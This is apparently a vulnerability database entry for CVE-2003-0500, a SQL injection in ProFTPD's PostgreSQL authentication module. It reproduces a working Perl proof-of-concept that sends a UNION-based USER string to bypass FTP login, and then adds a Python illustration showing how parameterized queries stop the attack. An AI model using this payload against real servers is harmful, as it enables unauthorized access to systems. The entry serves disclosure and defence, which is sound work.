ProFTPD PostgreSQL Authentication Module SQL Injection Vulnerability


Vulnerability ID: 1107387    Vulnerability type: SQL injection
Published: 2003-06-19    Updated: 2003-08-07
CVE ID: CVE-2003-0500
CNNVD-ID: CNNVD-200308-006
Platform: Linux    CVSS score: 10.0
|Sources
https://www.exploit-db.com/exploits/43
https://www.securityfocus.com/bid/82756
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-006
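|Vulnerability details
The PostgreSQL authentication module in ProFTPD versions before 1.2.9rc1 contains a SQL injection vulnerability. A remote attacker can use the USER name to bypass authentication or steal passwords, executing arbitrary SQL and escalating privileges.
|Exploit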
#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003

use IO::Socket;
if(@ARGC<2){
    print "\nProof Of Concept Sql Inject on ProFTPD\n";
    print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
    exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)
                          or die "Can't connect. \n";
if(defined($line=<$remote>)){
    print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...

if($query eq "1"){
    print $remote "USER ')UNION SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
}else{
    print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' WHERE(''='\n";
};
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print $remote "PASS p\n";
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print "Sent query to $ARGV[0]\n";
if($line =~ /230/){  #logged in
    print "[------- Sql Inject Able \n";
}else{
    print "[------- Sql Inject Unable \n";
}
close $remote;

# milw0rm.com [2003-06-19]
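
How the USER argument from the PoC above rewrites the user lookup, and why a bound parameter stops it. This is an added example, not ProFTPD's or the PoC author's code. It uses SQLite in place of PostgreSQL, and the query template, table layout and plaintext password comparison are assumptions made for illustration.

```python
import sqlite3

# Constructed stand-in for the user lookup; the template and table layout are
# assumptions inferred from the column order in the PoC payload.
LOOKUP = "SELECT userid, passwd, uid, gid, shell FROM users WHERE (userid='%s')"
LOOKUP_BOUND = "SELECT userid, passwd, uid, gid, shell FROM users WHERE (userid=?)"

# USER argument exactly as sent by the PoC on this page (default query).
POC_USER = "')UNION SELECT'u','p',1002,1002,'/bin/bash' WHERE(''='"


def make_db():
    """In-memory table holding one legitimate (constructed) account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users "
               "(userid TEXT, passwd TEXT, uid INT, gid INT, shell TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret', 1001, 1001, '/bin/sh')")
    return db


def lookup_vulnerable(db, user):
    """Injection-prone pattern: the USER argument is spliced into the SQL text."""
    return db.execute(LOOKUP % user).fetchone()


def lookup_parameterized(db, user):
    """Hardened pattern: the USER argument is bound as data, never parsed as SQL."""
    return db.execute(LOOKUP_BOUND, (user,)).fetchone()


def login(lookup, db, user, password):
    """Authenticate against whatever row the lookup returns (simplified check)."""
    row = lookup(db, user)
    return row is not None and row[1] == password


if __name__ == "__main__":
    db = make_db()
    # The payload closes the quote and parenthesis, then UNIONs in its own row.
    print("query text :", LOOKUP % POC_USER)
    print("vulnerable :", lookup_vulnerable(db, POC_USER),
          login(lookup_vulnerable, db, POC_USER, "p"))
    print("bound param:", lookup_parameterized(db, POC_USER),
          login(lookup_parameterized, db, POC_USER, "p"))
```

With the spliced query the server authenticates against a row supplied entirely by the client, which is why the PoC follows up with `PASS p`; with the bound parameter the same string is just a user name that does not exist.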
|Affected products
ProFTPD Project ProFTPD 1.2.9 rc1
|References

Source: DEBIAN
Name: DSA-338
Link: http://www.debian.org/security/2003/dsa-338
Source: FULLDISC
Name: 20030618 SQL Inject in ProFTPD login against Postgresql using mod_sql
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2003-June/005826.html
